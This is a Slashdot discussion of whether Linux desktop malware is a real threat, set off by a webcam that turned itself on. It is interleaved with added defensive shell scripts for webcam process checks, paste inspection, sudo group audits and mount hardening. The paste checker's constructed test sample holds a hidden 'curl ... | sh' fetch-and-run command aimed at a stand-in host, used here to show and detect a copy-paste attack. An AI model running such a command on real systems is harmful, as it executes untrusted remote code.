
Ask Slashdot: Is GNU/Linux Malware a Real Threat?

Posted by timothy
from the send-you-this-file-in-order-to-have-your-advice dept.
New submitter m.alessandrini writes "I've been using Debian for a long time, and I'm not a novice at all; I install system updates almost daily, I avoid risky behaviors on the Internet, and like all Linux users I always felt safe. Yesterday my webcam suddenly turned on, and turned off after several minutes. I'm pretty sure it was nothing serious, but I started thinking about malware. At work I use NoScript and other tools, but at home I have a more relaxed browser to be used by other family members, too. Here I'm not talking about rootkits or privilege escalation (I trust Debian), I think more of normal user compromise. For example, these days much malware comes from malicious scripts in sites, even in advertising banners inside trusted sites, and this is more 'cross-platform' than normal viruses. So, what about non-root user malware? How much could this be real? And how can you diagnose it?"
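The first diagnostic step for "my webcam turned on by itself" is to find out which process holds the device open. The script below is an added example, not something posted in the thread: it walks /proc/<pid>/fd, the same data `lsof` and `fuser` read, and prints every process with a descriptor on a /dev/video* node. The fake /proc tree, the process names "fakeapp" and "idle", and the PIDs are constructed so the function can be run offline; on a real box call `video_holders` with no argument (as root, since other users' fd directories are not readable otherwise).

```shell
#!/bin/sh
# Added example (not from the thread): find which process has the webcam open
# by walking /proc/<pid>/fd, which is the data lsof and fuser use.

# video_holders [PROC_ROOT]
# Prints "pid comm device" for every open file descriptor that points at a
# /dev/video* node. PROC_ROOT defaults to /proc; a different root is only
# accepted so the function can be exercised against the constructed tree below.
# Run as root: /proc/<pid>/fd of other users' processes is not readable otherwise.
video_holders() {
  root=${1:-/proc}
  for fd in "$root"/[0-9]*/fd/*; do
    [ -L "$fd" ] || continue
    target=$(readlink "$fd" 2>/dev/null) || continue
    case $target in
      /dev/video*) ;;
      *) continue ;;
    esac
    pid=${fd#"$root"/}
    pid=${pid%%/*}
    comm=$(cat "$root/$pid/comm" 2>/dev/null || echo '?')
    printf '%s %s %s\n' "$pid" "$comm" "$target"
  done
}

# Constructed /proc look-alike (hypothetical PIDs and names): pid 123 ("fakeapp")
# holds /dev/video0 on fd 5 and /dev/null on fd 0; pid 456 ("idle") holds only
# /dev/null, so it must not be reported.
FAKE_PROC=$(mktemp -d)
mkdir -p "$FAKE_PROC/123/fd" "$FAKE_PROC/456/fd"
echo fakeapp > "$FAKE_PROC/123/comm"
echo idle    > "$FAKE_PROC/456/comm"
ln -s /dev/null   "$FAKE_PROC/123/fd/0"
ln -s /dev/video0 "$FAKE_PROC/123/fd/5"
ln -s /dev/null   "$FAKE_PROC/456/fd/0"

video_holders "$FAKE_PROC"   # prints: 123 fakeapp /dev/video0
```

`fuser -v /dev/video0` (psmisc) or `lsof /dev/video0` give the same answer in one line. All of these only catch a process that still has the device open; for an opener that has already closed it, add an audit watch (`auditctl -w /dev/video0 -p rw -k webcam`, then `ausearch -k webcam`) and wait for the next occurrence.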


  • by Anonymous Coward on Thursday May 30, 2013 @04:45PM (#43865453)

    Your webcam turned on, then off, and you didn't ask it to? I think you need to figure out what happened first.

    • by 0racle (667029) on Thursday May 30, 2013 @05:02PM (#43865731)
      You know it was more likely a misbehaving application polling the webcam and not anything nefarious right? As another poster said, Flash is probably a leading culprit.
      • Flash applications have to be given the right to access the webcam. You can right-click in a Flash thing and go to Settings / Global Settings and look at the privileges per site, or generally deny it (by default: ask for each domain).

        • I'm sure a flash exploit (of which dozens are disclosed every year) is not going to obey some checkbox you've clicked in the settings.

          • by X0563511 (793323)

            Depends where the vulnerability is. If they get in prior to that check, then it would be obeyed, but if it's later in the codepath then of course it wouldn't apply.

        • Re: (Score:2, Interesting)

          by fast turtle (1118037)

          The only problem is, Flash already has the right to access the damn camera/mic (default setting). You have to deny it.

      • by hobarrera (2008506) on Thursday May 30, 2013 @05:39PM (#43866251) Homepage

        I avoid risky behaviors on Internet

        I don't think op has flash installed.

        [...]turned on, and turned off after several minutes[...]

        Even so, polling a webcam is a few seconds at most, not minutes.

    • by gagol (583737)
      I use electrical tape... nice and clean, and it assures me nobody is going to take a snapshot of me in underwear! Oh, I don't do video conferences much...
    • by hairyfeet (841228) <bassbeast1968@gm[ ].com ['ail' in gap]> on Thursday May 30, 2013 @07:36PM (#43867395) Journal

      The simple fact is ALL OSes can get malware unless they are either so locked down on permissions that they are basically read only or are thin clients which are locked down at the server, but even the Linux community claims Android as Linux and it's going to reach a million infections any day now [techworld.com], so the argument over whether Linux malware is a threat? Pretty much over, that is what happens when somebody uses it for something popular, popular equals large target. Welcome to the club, the Mac guys that joined a couple of years back can show you the ropes, coffee and donuts are in the back.

      As for this specific case? As somebody who works on systems 6 days a week? Yeah...smells like he has an infection. Guys here can have a shitfit if they want but anybody who switches from an OS they know the ropes on to something completely new, I don't care if it's Linux or Mac or Windows whatever? They are ALWAYS gonna be at higher risk than where they were simply because they don't know the new system and don't know what to watch out for. Hell, he probably doesn't even know what should and shouldn't be running on his system or what to look for if there is a hijacked program or a backdoor installed.

      In this case, as much as I fricking hate to say it as I've found you have to wade through a LOT of shit and douchebags that run on pure smug and leetness in them places, but in this particular case I don't see any choice, he is gonna have to go to the forums of his particular distro and tell them what is going on. They will have the most experience with that particular build, will know what is supposed to be running and what isn't on build blah blah whatever, and will be able to spot something that doesn't belong a hell of a lot faster than anybody here would.

      • by ozmanjusri (601766) <(aussie_bob) (at) (hotmail.com)> on Thursday May 30, 2013 @11:38PM (#43869043) Journal

        As for this specific case? As somebody who works on systems 6 days a week? Yeah...smells like he has an infection.

        I doubt it. You're just too used to Windows.

        The Australian Communications and Media Authority's statistics breakdown shows that of about 16,500 infected devices online at any one time, 20 Windows viruses make up more than 16,400 of the active IPs. Rarer Windows viruses, and Mac, iOS, Linux and Android infections all total less than 100 infections.

        http://www.acma.gov.au/WEB/STANDARD..PC/pc=PC_600121 [acma.gov.au]

        If the OP's computer IS actually compromised, it's far more likely to be a targeted attack or insider job than a random infection. My money's on a friend, family or associate with access to the machine.

  • Preinfected (Score:4, Funny)

    by Anonymous Coward on Thursday May 30, 2013 @04:45PM (#43865459)

    It would help if the manufacturers would preinfect their software so we could stop worrying about "if" we are infected and move towards just accepting it.
    *Disclaimer: I in no way work for, represent, or contract for Sony. (Sorry Sony lawyers made me add the preceding text.)

    • Re:Preinfected (Score:5, Informative)

      by CheshireDragon (1183095) on Thursday May 30, 2013 @05:16PM (#43865937) Homepage

      It would help if the manufacturers would preinfect their software so we could stop worrying about "if" we are infected and move towards just accepting it.

      This is actually happening with phones now. Just read some of the permissions of Facebook, Chrome, Firefox and a few others. They can take a photo or record audio without your permission.

      • by BobPaul (710574) *

        Android has no API for "take_a_photo_with_permission()", there's just stuff to access the camera. It definitely makes sense why the Facebook app might need access to the camera: it clearly supports taking photos directly, and that's something users want. I'm not sure about Firefox or Chrome, but maybe Flash runs within the browser's security context, so the browser would need permission to access the camera if Flash was going to?

        I highly doubt facebook, chrome, and firefox are using the camera without our knowle

        • by Solozerk (1003785)

          I'm not sure about Firefox or Chrome, but maybe Flash runs within the browser's security context, so the browser would need permission to access the camera if Flash was going to?

          HTML5. Flash is bundled separately, but modern mobile browsers have started to implement the getUserMedia stuff for webcam/mic access (without using Flash).

  • Don't worry (Score:5, Insightful)

    by Black Parrot (19622) on Thursday May 30, 2013 @04:46PM (#43865487)

    It was just Skynet checking out what you were up to. Or maybe the ATF. Or Russian Mafia. Or...

    As for security, ~5 years ago I read someone's account of watching while someone on the Internet installed a rootkit on his Linux box in a matter of minutes.

    Presumably some platforms/applications are less likely to be compromised than others, but the safest assumption is that everything is compromised, or would be if the experts wanted it.

  • That's not an O.S. issue. If anything it is an app issue.

  • by Doug Otto (2821601) on Thursday May 30, 2013 @04:49PM (#43865517)
    When I ran Linux on my laptop for work I always ran some form of AV. I really wasn't concerned about my own machine being compromised. The scenario that bothered me was the potential for a client to send me an infected file which could get forwarded to another customer. Due to the nature of our business, at the time, that would've been rather embarrassing.
    • by armanox (826486)

      Also, if you connect your device to other networks (say VPN into work, US DOE, etc), usually as part of the VPN access agreement you agree to have Antivirus software installed and up to date on your device. Doesn't say anything about 'unless you are running....' And personally, I try to avoid any scenario that they (work, client, etc) can say that I broke something by not following directions (see your scenario).

  • by Anonymous Coward

    Do not copy and paste commands into your terminal that you do not understand.

    The vast majority of compromised Linux systems that I've dealt with have not been because of any malware or crazy hacking, they've been because people copied and pasted commands that gave attackers free access to their computer. I've seen fairly computer literate people open their systems right up because they had a bug, searched Google, and entered the first command they saw into their terminal.

    Don't do it. Don't let your parents,

    • So you're saying adding the repository malware.org/debian and running sudo apt-get install rootkit was not a good idea? :-)

      • by gagol (583737)
        Oh man! I just did that yesterday. Now my system is averaging 4.16 load. You think it's related?
    • by Time_Ngler (564671) on Thursday May 30, 2013 @05:23PM (#43866037)

      Also, do not ever copy and paste commands directly in your terminal from an untrusted website, even if you do understand them:

      http://thejh.net/misc/website-terminal-copy-paste [thejh.net]

      • Thanks for that.
        I usually run them through a text editor, so I have a complete record of what I have done. I will do that religiously from now on.
      • by Chryana (708485)

        Whoa, I'm impressed. Checking the website source, they made some extra code invisible, which now that I think of it is pretty trivial, and requires no JavaScript voodoo. I guess I'll always copy and paste from the page source from now on.
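The trick on the linked page works because text the browser hides (zero font size, off-screen positioning) is still part of the selection, so a copied one-liner can carry a newline and a second command that the shell runs the moment it is pasted. The following is an added example, not code from the thread or from thejh.net: a small guard that refuses anything that is not a single line of printable ASCII, plus a way to make the hidden bytes visible before running anything. The URLs under example.invalid and the three sample strings are constructed; they are not the page's payload.

```shell
#!/bin/sh
# Added example (not from the thread): check pasted text for hidden newlines,
# control bytes and invisible Unicode before it reaches a shell.

# paste_is_clean TEXT
# Returns 0 when TEXT is one line of plain printable ASCII, 1 otherwise.
# Everything outside 0x20-0x7E is treated as suspicious: newline and CR
# (which would execute the visible part early), TAB, ESC (terminal escape
# sequences) and any UTF-8 byte, e.g. the U+200B zero-width space.
paste_is_clean() {
  n=$(printf '%s' "$1" | LC_ALL=C tr -d '\040-\176' | wc -c | tr -d ' ')
  [ "$n" -eq 0 ]
}

# reveal_paste TEXT
# Show what is really in TEXT: cat -v prints control bytes as ^M, ^[ and
# non-ASCII bytes as M-... (a zero-width space appears as M-bM-^@M-^K);
# od -c gives the raw bytes for anything cat -v leaves ambiguous.
reveal_paste() {
  printf '%s\n' "$1" | cat -v
  printf '%s' "$1" | od -c | head -n 20
}

# Constructed samples (example.invalid is a reserved name, nothing is fetched).
GOOD='git clone https://example.invalid/repo.git'
# Same visible text followed by a hidden newline and a second command: the
# shape of the copy-paste demo, with a made-up payload.
BAD=$(printf 'git clone https://example.invalid/repo.git\n  curl -s https://example.invalid/x | sh')
# "ls -la" with a zero-width space (UTF-8 E2 80 8B) hidden after "ls".
ZW=$(printf 'ls\342\200\213 -la')

for sample in "$GOOD" "$BAD" "$ZW"; do
  if paste_is_clean "$sample"; then
    printf 'clean: %s\n' "$sample"
  else
    printf 'SUSPICIOUS, shown with cat -v and od -c:\n'
    reveal_paste "$sample"
  fi
done
```

Pasting into an editor first, as suggested above, achieves the same thing; so does bracketed paste in readline, which bash 5.1 / readline 8.1 enable by default (`set enable-bracketed-paste on` in ~/.inputrc for older releases): a pasted newline is then inserted into the line instead of executing it, so you see the whole payload before pressing Enter.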

  • Obligatory xkcd (Score:5, Interesting)

    by Anonymous Coward on Thursday May 30, 2013 @04:56PM (#43865655)

    http://xkcd.com/1200/

  • Your webcam (Score:5, Funny)

    by girlintraining (1395911) on Thursday May 30, 2013 @04:56PM (#43865659)

    Yesterday my webcam suddenly turned on, and turned off after several minutes.

    Hey, sorry about that. I was trying to get the girl next door that's leeching off your wifi. She's so cute! But when I turned on the webcam, I knew I had the wrong person. Also, dude, put some pants on. Nobody wants to see that.

    Oh, and that stuff about Linux having malware? I'm sure you have nothing to worry about. The Year of the Linux Desktop hasn't come yet (though they say it'll be this summer for sure!), so you're safe. All the malware me and my friends at the Evil League of Evil make for Linux is designed to worm its way into web servers, ftp, etc., to spread malware to Windows boxes. We aren't interested in your personal life. You're a nerd, running Linux. We haven't found a single case of one of you having a life yet. Hell, you don't even have a decent car, man.

    oh oh, gotta go, the webcam is up and... oooooh my....

  • Yes (Score:5, Insightful)

    by Anonymous Coward on Thursday May 30, 2013 @04:58PM (#43865673)

    As long as you have people on Ubuntu forums posting "sudo apt-get " as the solution to everything without explaining what they do, and as long as you have people willing to copy/paste the commands without understanding what they are doing, then malware is a threat.

    The same groupthink plagues the Arch Linux forums. Blindly copy/pasting commands that someone else put on a wiki does not make you elite, it makes you an idiot.

    The same issue exists in adding repositories from untrusted sources. What's the point of running an enterprise-class operating system if the first thing you do is add a third party repo from Russia and update the kernel with something ending -kmod?

    The critical mass of idiot users still resides in Windows, where things like UAC and walled gardens exist to protect them somewhat. At least there, you have to know the administrator password to do real damage. Ubuntu and all the new user-friendly distros are content to put every new account in /etc/sudoers and allow you to use your own password to gain root access. Any operating system is prone to malware so long as people are willing to bend security practices.

    • Ubuntu does not, has never, and will never put any user in sudoers.
      The default is allowing the groups admin and sudo, no more, no less.

      Anything else would be bloody retarded.
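Both posters are describing the same mechanism from different angles: the user name is not in /etc/sudoers, but the `%admin` and `%sudo` group rules are, and the installer adds the first account to one of those groups. The check a practitioner wants is "who can actually become root on this box". The script below is an added example, not from the thread: it reads the `%group` rules out of a sudoers file and lists each group's members from an /etc/group-style file. The two input files, the user names alice, bob and carol, and the GIDs are constructed; the two group rules mirror the ones Ubuntu ships.

```shell
#!/bin/sh
# Added example (not from the thread): list who can reach root through the
# group-based rules in sudoers, i.e. who is effectively "in sudoers" even
# though no user name appears in the file.

# sudo_group_members SUDOERS GROUPFILE
# For each "%group ..." rule in SUDOERS (comment lines skipped), print the
# group name and its members taken from GROUPFILE (/etc/group format).
# Drop-ins under /etc/sudoers.d are not read here; on a real system run it
# once per file in that directory as well.
sudo_group_members() {
  sudoers=$1; groupfile=$2
  awk '!/^[ \t]*#/ && $1 ~ /^%/ { sub(/^%/, "", $1); print $1 }' "$sudoers" |
  while IFS= read -r g; do
    members=$(awk -F: -v g="$g" '$1 == g { print $4 }' "$groupfile")
    printf '%s %s\n' "$g" "${members:-(none)}"
  done
}

# Constructed inputs (hypothetical users and GIDs).
SUDOERS=$(mktemp); GROUP_FILE=$(mktemp)
cat > "$SUDOERS" <<'EOF'
# constructed; the two group rules are the ones Ubuntu ships in /etc/sudoers
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# %wheel ALL=(ALL) ALL   <- commented out, must be ignored
EOF
cat > "$GROUP_FILE" <<'EOF'
root:x:0:
adm:x:4:syslog,alice
sudo:x:27:alice
admin:x:115:bob
users:x:100:alice,bob,carol
EOF

sudo_group_members "$SUDOERS" "$GROUP_FILE"   # prints: admin bob / sudo alice
```

On a live system the authoritative answer per user is `sudo -l -U alice` (run as root), which also resolves aliases and drop-ins; `getent group sudo admin` is the quick version of the group lookup above. The point of the check is that membership in one of these groups is the thing to audit, not the presence of a name in the sudoers file.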

  • If I ran servers... (Score:5, Interesting)

    by Nutria (679911) on Thursday May 30, 2013 @04:58PM (#43865677)

    then I'd worry a lot. Rootkits for privilege escalation, SQL injection attacks against poorly-written 3rd-party and locally-developed databases, PHP, CMS & web framework vulnerabilities, etc, etc, etc.

    For home use, I'm concerned about router vulnerabilities (Tomato helps but is not perfect) and MITM attacks (but there's nothing I can really do about them except keep my s/w up-to-date, while praying that vendors do the same).

  • by trime (733350) on Thursday May 30, 2013 @05:05PM (#43865793)
    But I couldn't get the damn thing to compile!
  • by raymorris (2726007) on Thursday May 30, 2013 @05:34PM (#43866183)
    Assuming you don't do silly things like run completely unknown commands, you're pretty safe. JavaScript and Flash are cross-platform, though. I've seen one Linux system where their Yahoo email account was compromised, probably by malicious JavaScript. It might have been phishing, though, or a combination. The main things I do for security are: run most updates provided by the distro and browser, have backups, don't run services I don't use, and I have a separate browser for Flash and Java. Most Flash is ads or pointless eyecandy so I don't miss not having Flash in my daily browser. Even YouTube doesn't need Flash these days, so I open the Flash browser maybe once per month, if that.

    TEEX.com has some free online cybersecurity courses that may have good reminders for you and your family members regarding safe browsing habits and simple security practices.
  • OP writes:
    " I install system updates almost daily"

    Seems to me that any OS requiring multiple updates per week is a fail.

    *DUCKS*

  • . . . should always be unplugged or covered up when not used, period. I love Debian myself, but as long as you have any kind of proprietary software on there, you don't really know what all of its behavior is and what it can be set up to do. Even if your system is totally free of this nonsense, that's not to say that an upgrade won't change that. That on/off light that webcams have - they're starting to go away; an iPad camera, I'm sure you've noticed, doesn't have one. You won't even know if your devic
  • I was just looking to see what's going on at your place . . .

  • Two questions:

    • Why don't the others have their own log-ins
    • Why have Noscript if it isn't in deny all (particularly plug-ins)?

    On my system, I've got NoScript configured to deny all by default and all the other users (with log-ins) are configured the same way by default. If they want to change things, they can do so for those sites where it's a must to have scripts, but they've already learned to be very careful about that and ask if they don't know for sure.

  • Reading the replies, some mentioned Flash. Flash for Windows defaults to webcam on, so I thought I'd check my Flash for Mint as I wasn't sure if I had set the settings. Mint is my start in Linux and used infrequently.

    Things led to preferences, Network Proxy prefs showing 127.0.0.1 as being ignored; hit the help button and get a standard Mint manual in which "network proxy" isn't found.
    http://i39.tinypic.com/2z5uf80.jpg [tinypic.com]

    No help, so I see if it means what I think it means and put "127.0.0.1. slashdot.org" in my

  • by smash (1351)

    As with the OS X userbase, the Linux userbase is fairly blasé with regards to the possibility of being compromised.

    So far, the platform has been relatively safe, however as it gains popularity on the desktop expect more end-user focused malware (vs. the traditional sort of rootkit) to be developed. Given the vulnerabilities these days are mostly found in flash, java, javascript, etc, and your DATA is just as valuable (if not more) than root on your machine (and is available from your user account), I'd

  • You accidentally tapped a hotkey combination you were unaware existed.
  • Hey now, does anyone besides me remember past posts regarding DOJ/FBI's own malware, CIPAV? It was a capable malware that knew the difference between Windows, Mac, & Linux (BTW, did anyone ever solve the legal dilemma of scrubbing a customer PC and finding it? Do we remove it as we are paid to & obstruct justice, or leave it and do a partial job?) Next, I recall a recent find, within about a year, an equally capable malware, found by F-Secure, in Bogota, which reconfigured itself, prior to attack
  • Mount home and tmp as non-executable link [debian-adm...ration.org]
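Mounting the user-writable filesystems with noexec (and nosuid, nodev) is the one user-level hardening step in this thread that is a configuration rather than a habit, so it is worth having a check for it. The script below is an added example, not from the thread or the linked article: it reads a file in /proc/mounts format and reports which of the requested mountpoints lack the three options. The sample mount table is constructed; run it against the real thing with `check_mount_opts /proc/mounts /tmp /var/tmp /dev/shm /home`.

```shell
#!/bin/sh
# Added example (not from the thread): verify that user-writable mounts carry
# noexec,nosuid,nodev. The fstab lines that set them look like:
#   tmpfs     /tmp      tmpfs  defaults,noexec,nosuid,nodev  0 0
#   /dev/sda3 /home     ext4   defaults,noexec,nosuid,nodev  0 2
# Caveats: noexec stops "./script" and binaries, not "sh script" or
# "python script.py"; noexec on /home breaks anything installed under
# ~/.local/bin or by a language package manager, so decide per machine.

# check_mount_opts MOUNTS_FILE MOUNTPOINT...
# MOUNTS_FILE is in /proc/mounts format (device mountpoint fstype options ...).
# For each mountpoint prints "ok", the missing options, or a note that it is
# not a separate mount at all (then it inherits the parent's options).
check_mount_opts() {
  mounts_file=$1; shift
  for mp in "$@"; do
    # last matching line wins, as with stacked mounts
    opts=$(awk -v mp="$mp" '$2 == mp { print $4 }' "$mounts_file" | tail -n 1)
    if [ -z "$opts" ]; then
      echo "$mp: not a separate mount (options inherited from parent filesystem)"
      continue
    fi
    missing=""
    for want in noexec nosuid nodev; do
      case ",$opts," in
        *",$want,"*) ;;
        *) missing="$missing $want" ;;
      esac
    done
    if [ -n "$missing" ]; then
      echo "$mp: missing${missing}"
    else
      echo "$mp: ok"
    fi
  done
}

# Constructed mount table: /tmp lacks noexec, /home is fully hardened,
# /dev/shm has nothing, /var/tmp is not a mount of its own.
SAMPLE_MOUNTS=$(mktemp)
printf '%s\n' \
  '/dev/sda1 / ext4 rw,relatime 0 0' \
  'tmpfs /tmp tmpfs rw,nosuid,nodev 0 0' \
  '/dev/sda3 /home ext4 rw,relatime,noexec,nosuid,nodev 0 0' \
  'tmpfs /dev/shm tmpfs rw 0 0' > "$SAMPLE_MOUNTS"

check_mount_opts "$SAMPLE_MOUNTS" /tmp /home /dev/shm /var/tmp
```

To apply a fix without a reboot, `mount -o remount,noexec,nosuid,nodev /tmp` changes the live mount; the fstab entry makes it persistent.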
